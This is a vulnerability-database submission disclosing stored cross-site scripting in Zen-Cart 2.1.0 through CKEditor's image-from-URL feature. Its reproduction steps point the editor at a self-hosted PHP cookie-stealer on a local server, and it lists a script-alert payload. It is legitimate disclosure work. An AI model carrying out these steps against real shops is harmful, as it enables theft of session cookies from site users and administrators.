Submit #628298: Zen Ventures, LLC Zen-Cart 2.1.0 Cross Site Scripting (info)

Title: Zen Ventures, LLC Zen-Cart 2.1.0 Cross Site Scripting
Description:

Description

Zencart has an interesting feature that allows administrators to change the text editor used across the website for editing pages or products, and gives them two choices: a “Plain text” editor and “CKEditor”. The problem is that CKEditor allows inserting images from a link. SVG images are blacklisted by default in Zencart. If you try to upload an SVG file you will get errors, but you can still insert an SVG file through CKEditor's “Insert image from URL” functionality. In fact, you can also insert malicious .php cookie grabbers and the application will treat them as an image, which results in an immediate trigger as soon as the web page loads.

Reproduce

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.

Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:
> php -S x.x.x.x:1718

To reproduce this issue, change your Text Editor's type from Plain Text to CKEditor. You can make this change through [/index.php?cmd=define_pages_editor]

Once done, open a product for editing. The URI may look something like this:
[/index.php?cmd=product&page=1&cPath=1_4&product_type=1&pID=1&action=new_product]

Click the “Insert image via URL” icon in CKEditor. A small window will appear asking for an image link, but there is no filtering in place to ensure that users only use this feature to insert images and not something else.

Inside this small window, you can put the full link to your PHP cookie grabber. In my case it's the following:
http://127.0.0.1:1718/capture.php

Now you can visit the product and check your PHP server for cookie logs:
http://127.0.0.1/zencart/index.php?main_page=product_info&cPath=1_4&products_id=1

Additionally, the following payload works as well:
<script>alert("hacked")</script>
Source: https://hkohi.ca/vulnerability/28
User: 0xHamy (UID 88518)
Submission: 04/08/2025 18h44 (11 months ago)
Moderation: 17/08/2025 16h20 (13 days later)
Status: Accepted
VulDB entry: 320425 [ZenCart 2.1.0 CKEditor Cross Site Scripting]
Points: 20